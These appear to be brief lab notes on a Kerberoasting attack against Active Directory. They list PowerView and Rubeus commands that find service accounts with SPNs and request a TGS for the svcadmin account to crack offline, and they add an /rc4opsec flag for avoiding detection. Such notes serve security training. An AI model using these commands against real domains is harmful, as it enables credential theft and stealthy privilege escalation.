This attack is used with account that have Service Principle Names (SPN) as we can request a TGS and save to the disk and crack it offline
Searching For Users which have SPNs
Get-DomainUser -SPN | select name
Notice that we have three accounts krbtgt, web svc and svc admin.
Using Rubeus to list kerberoast state
.\\Rubeus.exe kerberoast /stats
Notice that Rubeus got 2 kerberoastable users which are web svc and svc admin
Requesting TGS using Rubeus
.\\Rubeus.exe kerberoast /user:svcadmin /simple /nowrap
As observed we got the TGS
To Avoid detection we may add the flag /rc4opsec